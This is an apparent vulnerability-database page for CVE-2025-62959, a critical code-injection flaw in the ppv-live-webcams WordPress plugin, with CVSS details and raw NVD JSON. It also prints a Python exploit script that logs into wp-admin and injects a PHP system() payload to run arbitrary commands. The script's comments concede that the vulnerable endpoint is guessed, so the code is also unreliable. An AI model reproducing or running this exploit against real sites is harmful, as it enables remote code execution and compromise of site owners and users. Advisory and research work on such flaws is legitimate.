Security Vulnerability Report
中文
CVE-2025-62959 CVSS 9.1 CRITICAL

CVE-2025-62959

Published: 2025-10-27 02:15:56
Last Modified: 2026-04-15 00:35:42

Description

Improper Control of Generation of Code ('Code Injection') vulnerability in videowhisper Paid Videochat Turnkey Site ppv-live-webcams allows Remote Code Inclusion.This issue affects Paid Videochat Turnkey Site: from n/a through <= 7.3.23.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

ppv-live-webcams WordPress插件 <= 7.3.23
videowhisper Paid Videochat Turnkey Site 任意版本至7.3.23

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-62959 PoC - Code Injection in ppv-live-webcams plugin # Target: WordPress site with ppv-live-webcams plugin <= 7.3.23 def exploit_rce(target_url, wp_admin_user, wp_admin_pass, cmd): """ Exploit code injection vulnerability to achieve RCE Args: target_url: Target WordPress site URL wp_admin_user: WordPress admin username wp_admin_pass: WordPress admin password cmd: Command to execute on target system """ session = requests.Session() # Step 1: Login to WordPress admin panel login_url = f"{target_url}/wp-login.php" login_data = { 'log': wp_admin_user, 'pwd': wp_admin_pass, 'wp-submit': 'Log In', 'redirect_to': f"{target_url}/wp-admin/" } resp = session.post(login_url, data=login_data, allow_redirects=True) if 'wp-admin' not in resp.url and 'dashboard' not in resp.url: print("[-] Login failed!") return None print("[+] Login successful!") # Step 2: Inject malicious code through vulnerable parameter # The exact vulnerable endpoint depends on plugin configuration # This is a generic PoC structure # Malicious payload - injects PHP code payload = { 'page': 'ppvlivewebcams', 'action': 'save_settings', # Vulnerable parameter - code injection point 'custom_code': f"<?php system('{cmd}'); ?>", } vuln_url = f"{target_url}/wp-admin/admin.php" resp = session.post(vuln_url, data=payload) # Step 3: Trigger the injected code trigger_url = f"{target_url}/wp-content/plugins/ppv-live-webcams/includes/settings.php" resp = session.get(trigger_url) return resp.text if __name__ == "__main__": if len(sys.argv) < 5: print(f"Usage: python {sys.argv[0]} <target_url> <admin_user> <admin_pass> <command>") print(f"Example: python {sys.argv[0]} http://target.com admin password 'id'") sys.exit(1) target = sys.argv[1] user = sys.argv[2] password = sys.argv[3] command = sys.argv[4] result = exploit_rce(target, user, password, command) if result: print("[+] Command executed successfully!") print(result)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62959", "sourceIdentifier": "[email protected]", "published": "2025-10-27T02:15:56.290", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Generation of Code ('Code Injection') vulnerability in videowhisper Paid Videochat Turnkey Site ppv-live-webcams allows Remote Code Inclusion.This issue affects Paid Videochat Turnkey Site: from n/a through <= 7.3.23."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/ppv-live-webcams/vulnerability/wordpress-paid-videochat-turnkey-site-plugin-7-3-22-remote-code-execution-rce-vulnerability?_s_id=cve", "source": "[email protected]"}]}}